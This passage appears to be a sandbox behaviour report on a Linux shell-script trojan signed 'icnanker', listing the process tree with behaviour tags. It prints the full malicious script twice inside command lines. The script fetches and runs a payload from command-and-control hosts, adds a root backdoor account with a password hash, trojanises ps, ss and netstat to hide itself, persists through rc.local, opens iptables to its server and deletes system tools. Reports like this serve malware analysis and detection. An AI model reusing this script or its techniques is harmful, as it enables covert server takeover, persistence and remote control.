/etc/rc.local | grep \"\$exit0\"`\" ]; then lockr -i /etc/;lockr -i /etc/rc.local echo \"\$bashpath start\" >> /etc/rc.local else lockr -i /etc/;lockr -i /etc/rc.local sed -i \"s|exit 0|\$bashpath start|\" /etc/rc.local echo \"exit 0\">>/etc/rc.local fi fi # by icnanker ----------------------------------------------- if [ ! -f /tmp/bash.log ];then UpdateIP=`nslookup sh.7ex.me|grep \"Address: \"|awk '{print \$2}'` if [ ! -z \"\$UpdateIP\" ];then lockr -i /tmp/;lockr -i /tmp/bash.log;rm -f /tmp/bash.log cd /tmp/;dget http://\$UpdateIP:5155/update.log cd \$path;mv -f /tmp/update.log /tmp/bash.log fi fi if [ -z \"`cat /etc/passwd|grep \"icnanker\"`\" ]; then lockr -i /etc/;lockr -i /etc/passwd #icnanker echo 'icnanker:x:0:1:icnanker:/root:/bin/bash' >> /etc/passwd fi if [ -z \"`cat /etc/shadow|grep \"icnanker\"`\" ]; then lockr -i /etc/;lockr -i /etc/shadow #ddos@nanker echo 'icnanker:\$6\$14nPldFS\$xcNbGMouKo..dH8idyM6D0RIpXVnVm.5B.qORnV6qqnW4V.Ru3IGGyhiNzKAWRee7hJtCXW8vhApM1bzAm54n.:16570:0:99999:7:::' >> /etc/shadow fi # by icnanker ----------------------------------------------- killall .sshd;pkill .sshd;lockr -i /usr/bin/.sshd;rm -f /usr/bin/.sshd lockr -i /usr/bin/;lockr -i /usr/bin/wget;rm -f /usr/bin/wget;lockr -i /usr/bin/chattr;rm -f /usr/bin/chattr lockr -i /etc/;lockr -i /etc/hosts.deny;cp -f \$deny /etc/hosts.deny;lockr +i /etc/hosts.deny >/dev/null 2>&1 lockr -i /etc/;lockr -i /etc/hosts.allow;cp -f \$allow /etc/hosts.allow;lockr +i /etc/hosts.allow >/dev/null 2>&1 lockr -i /etc/init.d/;lockr -i \$Config;sed -i \"s|\$tempbash|\$bashname|\" \$Config;lockr +i \$Config >/dev/null 2>&1 sleep 1;lockr -i /usr/bin/;cp -f \$0 \$bashpath;chmod 777 \$bashpath;nohup \$bashpath >/dev/null 2>&1 & lockr -i /bin/;lockr -i /bin/ps;sed -i \"s|\$tempbash|\$bashname|\" /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 lockr -i /etc/;lockr -i /etc/rc.local;sed -i \"s|\$bashtemp start|\$bashpath start|\" /etc/rc.local # by icnanker ----------------------------------------------- lockr -i \$0 rm -f \$0 exit" /usr/bin/f24a684025
  2⤵
  - File and Directory Permissions Modification
  - Writes DNS configuration
  - Writes file to system bin folder
  PID:2704
- - /usr/bin/.locks
    .locks -i /usr/bin/lockr
    3⤵
    PID:2715
- - /usr/bin/chmod
    chmod 777 /usr/bin/lockr
    3⤵
    - File and Directory Permissions Modification
    PID:2716
- - /usr/bin/lockr
    lockr +i /usr/bin/lockr
    3⤵
    PID:2717
- - /usr/bin/lockr
    lockr -i /usr/bin/dget
    3⤵
    PID:2718
- - /usr/bin/chmod
    chmod 777 /usr/bin/dget
    3⤵
    - File and Directory Permissions Modification
    PID:2719
- - /usr/bin/lockr
    lockr +i /usr/bin/dget
    3⤵
    PID:2720
- - /usr/bin/lockr
    lockr -i /usr/bin/pkill
    3⤵
    PID:2721
- - /usr/bin/chmod
    chmod 777 /usr/bin/pkill
    3⤵
    - File and Directory Permissions Modification
    PID:2722
- - /usr/bin/lockr
    lockr +i /usr/bin/pkill
    3⤵
    PID:2723
- - /usr/bin/lockr
    lockr -i /usr/bin/nohup
    3⤵
    PID:2724
- - /usr/bin/chmod
    chmod 777 /usr/bin/nohup
    3⤵
    - File and Directory Permissions Modification
    PID:2725
- - /usr/bin/lockr
    lockr +i /usr/bin/nohup
    3⤵
    PID:2726
- - /usr/bin/lockr
    lockr -i /usr/bin/killall
    3⤵
    PID:2727
- - /usr/bin/chmod
    chmod 777 /usr/bin/killall
    3⤵
    - File and Directory Permissions Modification
    PID:2728
- - /usr/bin/lockr
    lockr +i /usr/bin/killall
    3⤵
    PID:2729
- - /usr/bin/lockr
    lockr -i /usr/bin/nslookup
    3⤵
    PID:2730
- - /usr/bin/chmod
    chmod 777 /usr/bin/nslookup
    3⤵
    - File and Directory Permissions Modification
    PID:2731
- - /usr/bin/lockr
    lockr +i /usr/bin/nslookup
    3⤵
    PID:2732
- - /usr/bin/cat
    cat /etc/long.conf
    3⤵
    PID:2734
- - /usr/bin/awk
    awk "{print \$1}"
    3⤵
    PID:2735
- - /usr/bin/date
    date "+%s%N"
    3⤵
    PID:2737
- - /usr/bin/md5sum
    md5sum
    3⤵
    PID:2738
- - /usr/bin/head
    head -c 10
    3⤵
    PID:2739
- - /usr/bin/cat
    cat /etc/long.conf
    3⤵
    PID:2741
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2742
- - /usr/bin/date
    date "+%s%N"
    3⤵
    PID:2744
- - /usr/bin/md5sum
    md5sum
    3⤵
    PID:2745
- - /usr/bin/head
    head -c 10
    3⤵
    PID:2746
- - /usr/bin/nslookup
    nslookup top.t7ux.com
    3⤵
    - Reads CPU attributes
    PID:2748
- - /usr/bin/grep
    grep "Address: "
    3⤵
    PID:2749
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2750
- - /usr/bin/lockr
    lockr -i /etc/
    3⤵
    PID:2755
- - /usr/bin/lockr
    lockr -i /etc/resolv.conf
    3⤵
    PID:2756
- - /usr/bin/lockr
    lockr +i /etc/resolv.conf
    3⤵
    PID:2757
- - /usr/sbin/service
    service network restart
    3⤵
    PID:2758
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:2759
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:2760
- - /usr/local/sbin/systemctl
    systemctl restart network.service
    3⤵
    PID:2758
- - /usr/local/bin/systemctl
    systemctl restart network.service
    3⤵
    PID:2758
- - /usr/sbin/systemctl
    systemctl restart network.service
    3⤵
    PID:2758
- - /usr/bin/systemctl
    systemctl restart network.service
    3⤵
    PID:2758
- - /usr/bin/sleep
    sleep 1
    3⤵
    PID:2761
- - /usr/bin/nslookup
    nslookup top.t7ux.com
    3⤵
    - Reads CPU attributes
    PID:2763
- - /usr/bin/grep
    grep "Address: "
    3⤵
    PID:2764
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2765
- - /usr/bin/cat
    cat /bin/ss
    3⤵
    PID:2771
- - /usr/bin/grep
    grep
    3⤵
    PID:2772
- - /usr/bin/lockr
    lockr -i /bin/
    3⤵
    PID:2773
- - /usr/bin/lockr
    lockr -i /bin/ss
    3⤵
    PID:2774
- - /usr/bin/chmod
    chmod 777 /bin/ss
    3⤵
    - File and Directory Permissions Modification
    PID:2775
- - /usr/bin/lockr
    lockr +i /bin/ss
    3⤵
    PID:2776
- - /usr/bin/cat
    cat /bin/ps
    3⤵
    PID:2778
- - /usr/bin/grep
    grep "#!/bin/sh"
    3⤵
    PID:2779
- - /usr/bin/grep
    grep
    3⤵
    PID:2782
- - /usr/bin/grep
    grep ACCEPT
    3⤵
    PID:2783
- - /usr/bin/ips
    ips -ef
    3⤵
    - Checks CPU configuration
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    - System Network Configuration Discovery
    PID:2785
- - /usr/bin/grep
    grep b293c49147
    3⤵
    PID:2786
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2787
- - /usr/bin/wc
    wc -l
    3⤵
    PID:2788
- - /usr/bin/lockr
    lockr -i /usr/bin/
    3⤵
    PID:2789
- - /usr/bin/lockr
    lockr -i /usr/bin/Drkv
    3⤵
    PID:2790
- - /usr/bin/rm
    rm -f /usr/bin/Drkv
    3⤵
    PID:2791
- - /usr/bin/dget
    dget http://:6513/Drkv
    3⤵
    PID:2792
- - /usr/bin/mv
    mv -f /usr/bin/Drkv /usr/bin/eb71db4869
    3⤵
    PID:2793
- - /usr/bin/grep
    grep :9506
    3⤵
    PID:2796
- - /usr/bin/cut
    cut -d / -f 1
    3⤵
    PID:2797
- - /usr/bin/awk
    awk "{print \$9}"
    3⤵
    PID:2798
- - /usr/bin/killall
    killall b293c49147
    3⤵
    - Reads runtime system information
    PID:2799
- - /usr/bin/pkill
    pkill b293c49147
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2800
- - /usr/bin/lockr
    lockr -i /usr/bin/
    3⤵
    PID:2801
- - /usr/bin/lockr
    lockr -i /usr/bin/b293c49147
    3⤵
    PID:2802
- - /usr/bin/rm
    rm -f /usr/bin/b293c49147
    3⤵
    PID:2803
- - /usr/bin/cat
    cat /etc/long.conf
    3⤵
    PID:2805
- - /usr/bin/grep
    grep b293c49147
    3⤵
    PID:2806
- - /usr/bin/lockr
    lockr -i /etc/long.conf
    3⤵
    PID:2807
- - /usr/bin/sed
    sed -i "s|b293c49147|eb71db4869|" /etc/long.conf
    3⤵
    PID:2808
- - /usr/bin/lockr
    lockr +i /etc/long.conf
    3⤵
    PID:2809
- - /usr/bin/cat
    cat /bin/ps
    3⤵
    PID:2811
- - /usr/bin/grep
    grep b293c49147
    3⤵
    PID:2812
- - /usr/bin/lockr
    lockr -i /bin/ps
    3⤵
    PID:2813
- - /usr/bin/sed
    sed -i "s|b293c49147|eb71db4869|" /bin/ps
    3⤵
    - Writes file to system bin folder
    PID:2814
- - /usr/bin/lockr
    lockr +i /bin/ps
    3⤵
    PID:2815
- - /usr/bin/chmod
    chmod 777 /usr/bin/eb71db4869
    3⤵
    - File and Directory Permissions Modification
    PID:2816
- - /usr/bin/cp
    cp -f /usr/bin/eb71db4869 /usr/bin/longbak
    3⤵
    PID:2818
- - /usr/bin/nohup
    nohup /usr/bin/eb71db4869
    3⤵
    PID:2817
- - /usr/bin/eb71db4869
    /usr/bin/eb71db4869
    3⤵
    PID:2817
- - /usr/bin/chmod
    chmod 777 /usr/bin/longbak
    3⤵
    - File and Directory Permissions Modification
    PID:2819
- - /usr/bin/lockr
    lockr +i /usr/bin/longbak
    3⤵
    PID:2820
- - /usr/bin/cat
    cat /etc/rc.local
    3⤵
    PID:2822
- - /usr/bin/grep
    grep start
    3⤵
    PID:2823
- - /usr/bin/wc
    wc -l
    3⤵
    PID:2824
- - /usr/bin/cat
    cat /etc/rc.local
    3⤵
    PID:2826
- - /usr/bin/grep
    grep /usr/bin/f24a684025
    3⤵
    PID:2827
- - /usr/bin/nslookup
    nslookup sh.7ex.me
    3⤵
    - Reads CPU attributes
    PID:2829
- - /usr/bin/grep
    grep "Address: "
    3⤵
    PID:2830
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2831
- - /usr/bin/cat
    cat /etc/passwd
    3⤵
    PID:2837
- - /usr/bin/grep
    grep icnanker
    3⤵
    PID:2838
- - /usr/bin/cat
    cat /etc/shadow
    3⤵
    - OS Credential Dumping
    PID:2840
- - /usr/bin/grep
    grep icnanker
    3⤵
    PID:2841
- - /usr/bin/killall
    killall .sshd
    3⤵
    - Reads runtime system information
    PID:2842
- - /usr/bin/pkill
    pkill .sshd
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2843
- - /usr/bin/lockr
    lockr -i /usr/bin/.sshd
    3⤵
    PID:2844
- - /usr/bin/rm
    rm -f /usr/bin/.sshd
    3⤵
    PID:2845
- - /usr/bin/lockr
    lockr -i /usr/bin/
    3⤵
    PID:2846
- - /usr/bin/lockr
    lockr -i /usr/bin/wget
    3⤵
    PID:2847
- - /usr/bin/rm
    rm -f /usr/bin/wget
    3⤵
    PID:2848
- - /usr/bin/lockr
    lockr -i /usr/bin/chattr
    3⤵
    PID:2849
- - /usr/bin/rm
    rm -f /usr/bin/chattr
    3⤵
    PID:2850
- - /usr/bin/lockr
    lockr -i /etc/
    3⤵
    PID:2851
- - /usr/bin/lockr
    lockr -i /etc/hosts.deny
    3⤵
    PID:2852
- - /usr/bin/cp
    cp -f /etc/deny.bak /etc/hosts.deny
    3⤵
    PID:2853
- - /usr/bin/lockr
    lockr +i /etc/hosts.deny
    3⤵
    PID:2854
- - /usr/bin/lockr
    lockr -i /etc/
    3⤵
    PID:2855
- - /usr/bin/lockr
    lockr -i /etc/hosts.allow
    3⤵
    PID:2856
- - /usr/bin/cp
    cp -f /etc/allow.bak /etc/hosts.allow
    3⤵
    PID:2857
- - /usr/bin/lockr
    lockr +i /etc/hosts.allow
    3⤵
    PID:2858
- - /usr/bin/lockr
    lockr -i /etc/init.d/
    3⤵
    PID:2859
- - /usr/bin/lockr
    lockr -i /etc/long.conf
    3⤵
    PID:2860
- - /usr/bin/sed
    sed -i "s|f24a684025|fd7c90b56a|" /etc/long.conf
    3⤵
    PID:2861
- - /usr/bin/lockr
    lockr +i /etc/long.conf
    3⤵
    PID:2862
- - /usr/bin/sleep
    sleep 1
    3⤵
    PID:2863
- - /usr/bin/lockr
    lockr -i /usr/bin/
    3⤵
    PID:2864
- - /usr/bin/cp
    cp -f /usr/bin/f24a684025 /usr/bin/fd7c90b56a
    3⤵
    - Write file to user bin folder
    PID:2865
- - /usr/bin/chmod
    chmod 777 /usr/bin/fd7c90b56a
    3⤵
    - File and Directory Permissions Modification
    PID:2866
- - /usr/bin/lockr
    lockr -i /bin/
    3⤵
    PID:2868
- - /usr/bin/nohup
    nohup /usr/bin/fd7c90b56a
    3⤵
    PID:2867
- - /usr/bin/fd7c90b56a
    /usr/bin/fd7c90b56a
    3⤵
    PID:2867
- - /usr/bin/lockr
    lockr -i /bin/ps
    3⤵
    PID:2869
- - /usr/bin/sed
    sed -i "s|f24a684025|fd7c90b56a|" /bin/ps
    3⤵
    - Writes file to system bin folder
    PID:2870
- - /bin/sh
    /usr/bin/fd7c90b56a -c "exec '/usr/bin/fd7c90b56a' \"\$@\"" /usr/bin/fd7c90b56a
    3⤵
    PID:2867
- - /usr/bin/fd7c90b56a
    /usr/bin/fd7c90b56a
    3⤵
    PID:2867
- - /usr/bin/lockr
    lockr +i /bin/ps
    3⤵
    PID:2871
- - /usr/bin/lockr
    lockr -i /etc/
    3⤵
    PID:2872
- - /usr/bin/lockr
    lockr -i /etc/rc.local
    3⤵
    PID:2873
- - /usr/bin/sed
    sed -i "s|/usr/bin/f24a684025 start|/usr/bin/fd7c90b56a start|" /etc/rc.local
    3⤵
    PID:2874
- - /bin/sh
    /usr/bin/fd7c90b56a -c "#!/bin/sh path=`pwd` exit0=\"exit 0\" ips=\"/usr/bin/ips\" iss=\"/usr/bin/iss\" Net=\"/usr/bin/nets\" Get=\"/usr/bin/dget\" Lok=\"/usr/bin/lockr\" deny=\"/etc/deny.bak\" allow=\"/etc/allow.bak\" Config=\"/etc/long.conf\" filebak=\"/usr/bin/longbak\" issbak=\"/usr/bin/dpkgd/ss\" ipsbak=\"/usr/bin/dpkgd/ps\" Netbak=\"/usr/bin/dpkgd/netstat\" Runkillallconnect() { killpid=`nets -anept 2>/dev/null|grep \"\$Address:9506\"|cut -d / -f 1|awk '{print \$9}'` kill \$killpid 2>/dev/null;kill -3 \$killpid 2>/dev/null;kill -9 \$killpid 2>/dev/null killall \$tempfile;pkill \$tempfile;lockr -i /usr/bin/;lockr -i \$filetemp;rm -f \$filetemp if [ -z \"`cat \$Config|grep \$tempfile`\" ]; then lockr -i /etc/init.d/;lockr -i \$Config echo \$filename \$tempbash \$Address > \$Config;lockr +i \$Config >/dev/null 2>&1 else lockr -i \$Config;sed -i \"s|\$tempfile|\$filename|\" \$Config;lockr +i \$Config >/dev/null 2>&1 fi if [ -z \"`cat /bin/ps|grep \$tempfile`\" ]; then lockr -i /bin/;lockr -i /bin/ps;echo '#!/bin/sh' > /bin/ps;echo 'for arg in \"\$*\";do' >> /bin/ps echo 'ips \$arg|grep -v \"'\$tempbash'\"|grep -v \"'\$filename'\"|grep -v \"ips\"|grep -v \"grep\"' >> /bin/ps echo 'done;exit' >> /bin/ps;chmod 777 /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 else lockr -i /bin/ps;sed -i \"s|\$tempfile|\$filename|\" /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 fi } # ------------------------------------------------------------- if [ ! -f \"\$Lok\" ];then lockr -i /usr/bin/ if [ ! -f /usr/bin/wget ];then if [ -f /usr/bin/yum ];then yum -y install e2fsprogs;fi if [ -f /usr/bin/apt-get ];then apt-get -y install e2fsprogs;fi fi cp -f /usr/bin/chattr /usr/bin/lockr cp -f /usr/bin/chattr /usr/bin/.locks cp -f /usr/bin/.locks /usr/bin/lockr chmod 777 /usr/bin/lockr chmod 777 /usr/bin/.locks lockr +i /usr/bin/lockr >/dev/null 2>&1 lockr +i /usr/bin/.locks >/dev/null 2>&1 else .locks -i /usr/bin/lockr;chmod 777 /usr/bin/lockr lockr +i /usr/bin/lockr >/dev/null 2>&1 fi if [ ! -f \"\$Get\" ];then lockr -i /usr/bin/ if [ ! -f /usr/bin/wget ];then if [ -f /usr/bin/yum ];then yum -y install wget;fi if [ -f /usr/bin/apt-get ];then apt-get -y install wget;fi fi cp -f /usr/bin/wget /usr/bin/dget cp -f /usr/bin/wget /usr/bin/.bget cp -f /usr/bin/.bget /usr/bin/dget chmod 777 /usr/bin/dget lockr +i /usr/bin/dget >/dev/null 2>&1 lockr +i /usr/bin/.bget >/dev/null 2>&1 else lockr -i /usr/bin/dget;chmod 777 /usr/bin/dget lockr +i /usr/bin/dget >/dev/null 2>&1 fi if [ -f /usr/bin/pkill ];then lockr -i /usr/bin/pkill;chmod 777 /usr/bin/pkill lockr +i /usr/bin/pkill >/dev/null 2>&1 fi if [ -f /usr/bin/nohup ];then lockr -i /usr/bin/nohup;chmod 777 /usr/bin/nohup lockr +i /usr/bin/nohup >/dev/null 2>&1 fi if [ -f /usr/bin/killall ];then lockr -i /usr/bin/killall;chmod 777 /usr/bin/killall lockr +i /usr/bin/killall >/dev/null 2>&1 fi if [ -f /usr/bin/nslookup ];then lockr -i /usr/bin/nslookup;chmod 777 /usr/bin/nslookup lockr +i /usr/bin/nslookup >/dev/null 2>&1 fi if [ -f /etc/init.d/Me8ing.conf ];then Runkillallconnect rm -f \$0;exit fi # ------------------------------------------------------------- if [ ! -f \"\$Config\" ];then intranet=`ifconfig|grep 'inet '|grep -v '127.0'|xargs|awk -F '[ :]' '{print \$3}'|grep '192.168'` if [ \$intranet ];then exit;fi lockr -i /usr/bin/;lockr -i /etc/init.d/ echo \"byicnanker 2228668564\" > \$Config tempfile=`cat \$Config | awk '{print \$1}'` filetemp=\"/usr/bin/\$tempfile\" #��·�� filename=`date +%s%N | md5sum | head -c 10` filepath=\"/usr/bin/\$filename\" #��·�� tempbash=`cat \$Config | awk '{print \$2}'` bashtemp=\"/usr/bin/\$tempbash\" #�ֽű�·�� bashname=`date +%s%N | md5sum | head -c 10` bashpath=\"/usr/bin/\$bashname\" #�½ű�·�� else tempfile=`cat \$Config | awk '{print \$1}'` filetemp=\"/usr/bin/\$tempfile\" #��·�� filename=`date +%s%N | md5sum | head -c 10` filepath=\"/usr/bin/\$filename\" #��·�� tempbash=`cat \$Config | awk '{print \$2}'` bashtemp=\"/usr/bin/\$tempbash\" #�ֽű�·�� bashname=`date +%s%N | md5sum | head -c 10` bashpath=\"/usr/bin/\$bashname\" #�½ű�·�� if [ \$0 != \"\$bashtemp\" ];then lockr -i /usr/bin/;lockr -i /bin/ KA=`cat \$Config | awk '{print \$1}'` KPidA=`ips -ef|grep \$KA|awk '{print \$2}'` lockr -i /usr/bin/\$KA;rm -f /usr/bin/\$KA kill \$KPidA 2>/dev/null;kill -9 \$KPidA 2>/dev/null lockr -i \$filetemp;rm -f \$filetemp;lockr -i \$filebak;rm -f \$filebak killall .sshd;pkill .sshd;lockr -i /usr/bin/.sshd;rm -f /usr/bin/.sshd killall \$KA;pkill \$KA;killall \$KA;pkill \$KA;sleep 0.1 K1=`cat \$Config | awk '{print \$2}'` KPid1=`ips -ef|grep \$K1|awk '{print \$2}'` kill \$KPid1 2>/dev/null;kill -9 \$KPid1 2>/dev/null lockr -i /usr/bin/\$K1;rm -f /usr/bin/\$K1 killall \$K1;pkill \$K1;killall \$K1;pkill \$K1;sleep 0.4 K2=`cat \$Config | awk '{print \$2}'` KPid2=`ips -ef|grep \$K2|awk '{print \$2}'` kill \$KPid2 2>/dev/null;kill -9 \$KPid2 2>/dev/null lockr -i /usr/bin/\$K2;rm -f /usr/bin/\$K2 killall \$K2;pkill \$K2;killall \$K2;pkill \$K2;sleep 1.2 K3=`cat \$Config | awk '{print \$2}'` KPid3=`ips -ef|grep \$K3|awk '{print \$2}'` kill \$KPid3 2>/dev/null;kill -9 \$KPid3 2>/dev/null lockr -i /usr/bin/\$K3;rm -f /usr/bin/\$K3 killall \$K3;pkill \$K3;killall \$K3;pkill \$K3;sleep 0.5 K4=`cat \$Config | awk '{print \$2}'` KPid4=`ips -ef|grep \$K4|awk '{print \$2}'` kill \$KPid4 2>/dev/null;kill -9 \$KPid4 2>/dev/null lockr -i /usr/bin/\$K4;rm -f /usr/bin/\$K4 killall \$K4;pkill \$K4;killall \$K4;pkill \$K4;sleep 1.3 K5=`cat \$Config | awk '{print \$2}'` KPid5=`ips -ef|grep \$K5|awk '{print \$2}'` kill \$KPid5 2>/dev/null;kill -9 \$KPid5 2>/dev/null lockr -i /usr/bin/\$K5;rm -f /usr/bin/\$K5 killall \$K5;pkill \$K5;killall \$K5;pkill \$K5;sleep 0.6 K6=`cat \$Config | awk '{print \$2}'` KPid6=`ips -ef|grep \$K6|awk '{print \$2}'` kill \$KPid6 2>/dev/null;kill -9 \$KPid6 2>/dev/null lockr -i /usr/bin/\$K6;rm -f /usr/bin/\$K6 killall \$K6;pkill \$K6;killall \$K6;pkill \$K6;sleep 1.4 K7=`cat \$Config | awk '{print \$2}'` KPid7=`ips -ef|grep \$K7|awk '{print \$2}'` kill \$KPid7 2>/dev/null;kill -9 \$KPid7 2>/dev/null lockr -i /usr/bin/\$K7;rm -f /usr/bin/\$K7 killall \$K7;pkill \$K7;killall \$K7;pkill \$K7;sleep 0.1 lockr -i \$Config;sed -i \"s|\$tempbash|\$bashname|\" \$Config lockr -i /bin/ps;sed -i \"s|\$tempbash|\$bashname|\" /bin/ps fi fi # ------------------------------------------------------------- if [ ! -f /usr/bin/nslookup ];then if [ -f /usr/bin/apt-get ];then apt-get -y install dnsutils;fi if [ -f /usr/bin/yum ];then yum -y install bind-utils;fi fi ResolveIP=`nslookup top.t7ux.com|grep \"Address: \"|awk '{print \$2}'` if [ -z \"\$ResolveIP\" ];then lockr -i /etc/;lockr -i /etc/resolv.conf echo 'nameserver 114.114.114.114' > /etc/resolv.conf echo 'nameserver 8.8.8.8' >> /etc/resolv.conf echo 'nameserver 8.8.4.4' >> /etc/resolv.conf lockr +i /etc/resolv.conf >/dev/null 2>&1 service network restart;sleep 1 Address=`nslookup top.t7ux.com|grep \"Address: \"|awk '{print \$2}'` else Address=\"\$ResolveIP\" fi # ------------------------------------------------------------- if [ -f /bin/ss ];then if [ ! -f \"\$iss\" ];then if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/ss \$issbak cp -f /bin/ss \$iss else cp -f \$issbak \$iss fi chmod 777 \$iss;chmod 777 \$issbak lockr +i \$issbak >/dev/null 2>&1 lockr +i \$iss >/dev/null 2>&1 else if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;cp -f \$iss \$issbak lockr +i \$issbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/ss | grep \$Address`\" ]; then lockr -i /bin/;lockr -i /bin/ss echo '#!/bin/sh' > /bin/ss echo 'iss|grep -v \"'\$Address'\"' >> /bin/ss echo 'exit' >> /bin/ss chmod 777 /bin/ss;lockr +i /bin/ss >/dev/null 2>&1 fi fi fi if [ -f /usr/sbin/ss ];then if [ ! -f \"\$iss\" ];then if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /usr/sbin/ss \$issbak cp -f /usr/sbin/ss \$iss else cp -f \$issbak \$iss fi chmod 777 \$iss;chmod 777 \$issbak lockr +i \$issbak >/dev/null 2>&1 lockr +i \$iss >/dev/null 2>&1 else if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;cp -f \$iss \$issbak lockr +i \$issbak >/dev/null 2>&1 fi if [ -z \"`cat /usr/sbin/ss | grep \$Address`\" ]; then lockr -i /usr/sbin/;lockr -i /usr/sbin/ss echo '#!/bin/sh' > /usr/sbin/ss echo 'iss|grep -v \"'\$Address'\"' >> /usr/sbin/ss echo 'exit' >> /usr/sbin/ss chmod 777 /usr/sbin/ss;lockr +i /usr/sbin/ss >/dev/null 2>&1 fi fi fi if [ -f /bin/netstat ];then if [ ! -f \"\$Net\" ];then if [ ! -f \"\$Netbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/netstat \$Netbak cp -f /bin/netstat \$Net else cp -f \$Netbak \$Net fi chmod 777 \$Net;chmod 777 \$Netbak lockr +i \$Netbak >/dev/null 2>&1 lockr +i \$Net >/dev/null 2>&1 else if [ ! -f \"\$Netbak\" ];then lockr -i /usr/bin/;cp -f \$Net \$Netbak lockr +i \$Netbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/netstat | grep \$Address`\" ]; then lockr -i /bin/;lockr -i /bin/netstat echo '#!/bin/sh' > /bin/netstat echo 'for arg in \"\$*\";do' >> /bin/netstat echo 'nets \$arg | grep -v \"'\$Address'\"' >> /bin/netstat echo 'done;exit' >> /bin/netstat chmod 777 /bin/netstat;lockr +i /bin/netstat >/dev/null 2>&1 fi fi fi if [ -f /bin/ps ];then if [ ! -f \"\$ips\" ];then if [ ! -f \"\$ipsbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/ps \$ipsbak cp -f /bin/ps \$ips else cp -f \$ipsbak \$ips fi chmod 777 \$ips;chmod 777 \$ipsbak lockr +i \$ipsbak >/dev/null 2>&1 lockr +i \$ips >/dev/null 2>&1 else if [ ! -f \"\$ipsbak\" ];then lockr -i /usr/bin/;cp -f \$ips \$ipsbak lockr +i \$ipsbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/ps | grep '#!/bin/sh'`\" ]; then lockr -i /bin/;lockr -i /bin/ps echo '#!/bin/sh' > /bin/ps;echo 'for arg in \"\$*\";do' >> /bin/ps echo 'ips \$arg | grep -v \"'\$tempbash'\" | grep -v \"'\$tempfile'\" | grep -v \"ips\" | grep -v \"grep\"' >> /bin/ps echo 'done;exit' >> /bin/ps;chmod 777 /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 fi fi fi if [ ! -f \"\$deny\" ];then lockr -i /etc/;cp -f /etc/hosts.deny \$deny lockr +i \$deny >/dev/null 2>&1 fi if [ ! -f \"\$allow\" ];then lockr -i /etc/;cp -f /etc/hosts.allow \$allow lockr +i \$allow >/dev/null 2>&1 fi # by icnanker ----------------------------------------------- iptable=`iptables -L INPUT | grep \"\$Address\" | grep 'ACCEPT'` if [ -z \"\$iptable\" ];then iptables -I INPUT -s \$Address -j ACCEPT else iptables -D INPUT -s \$Address -j DROP fi process=`ips -ef | grep \"\$tempfile\" | grep -v \"grep\" | wc -l` if [ \$process != 1 ];then if [ ! -f \"\$filebak\" ];then lockr -i /usr/bin/;lockr -i /usr/bin/Drkv;rm -f /usr/bin/Drkv cd /usr/bin/;dget http://\$Address:6513/Drkv cd \$path;mv -f /usr/bin/Drkv \$filepath else cp -f \$filebak \$filepath fi Runkillallconnect chmod 777 \$filepath nohup \$filepath >/dev/null 2>&1 & fi if [ ! -f \"\$filebak\" ];then cp -f \$filepath \$filebak;chmod 777 \$filebak lockr +i \$filebak >/dev/null 2>&1 fi # by icnanker ----------------------------------------------- Repeatstart=`cat /etc/rc.local | grep 'start'| wc -l` if [ \$Repeatstart != 1 ];then lockr -i /etc/rc.local;sed -i '/start/d' /etc/rc.local fi if [ -z \"`cat /etc/rc.local | grep \"\$bashtemp\"`\" ]; then if [ -z \"`cat /etc/rc.local | grep \"\$exit0\"`\" ]; then lockr -i /etc/;lockr -i /etc/rc.local echo \"\$bashpath start\" >> /etc/rc.local else lockr -i /etc/;lockr -i /etc/rc.local sed -i \"s|exit 0|\$bashpath start|\" /etc/rc.local echo \"exit 0\">>/etc/rc.local fi fi # by icnanker ----------------------------------------------- if [ ! -f /tmp/bash.log ];then UpdateIP=`nslookup sh.7ex.me|grep \"Address: \"|awk '{print \$2}'` if [ ! -z \"\$UpdateIP\" ];then lockr -i /tmp/;lockr -i /tmp/bash.log;rm -f /tmp/bash.log cd /tmp/;dget http://\$UpdateIP:5155/update.log cd \$path;mv -f /tmp/update.log /tmp/bash.log fi fi if [ -z \"`cat /etc/passwd|grep \"icnanker\"`\" ]; then lockr -i /etc/;lockr -i /etc/passwd #icnanker echo 'icnanker:x:0:1:icnanker:/root:/bin/bash' >> /etc/passwd fi if [ -z \"`cat /etc/shadow|grep \"icnanker\"`\" ]; then lockr -i /etc/;lockr -i /etc/shadow #ddos@nanker echo 'icnanker:\$6\$14nPldFS\$xcNbGMouKo..dH8idyM6D0RIpXVnVm.5B.qORnV6qqnW4V.Ru3IGGyhiNzKAWRee7hJtCXW8vhApM1bzAm54n.:16570:0:99999:7:::' >> /etc/shadow fi # by icnanker ----------------------------------------------- killall .sshd;pkill .sshd;lockr -i /usr/bin/.sshd;rm -f /usr/bin/.sshd lockr -i /usr/bin/;lockr -i /usr/bin/wget;rm -f /usr/bin/wget;lockr -i /usr/bin/chattr;rm -f /usr/bin/chattr lockr -i /etc/;lockr -i /etc/hosts.deny;cp -f \$deny /etc/hosts.deny;lockr +i /etc/hosts.deny >/dev/null 2>&1 lockr -i /etc/;lockr -i 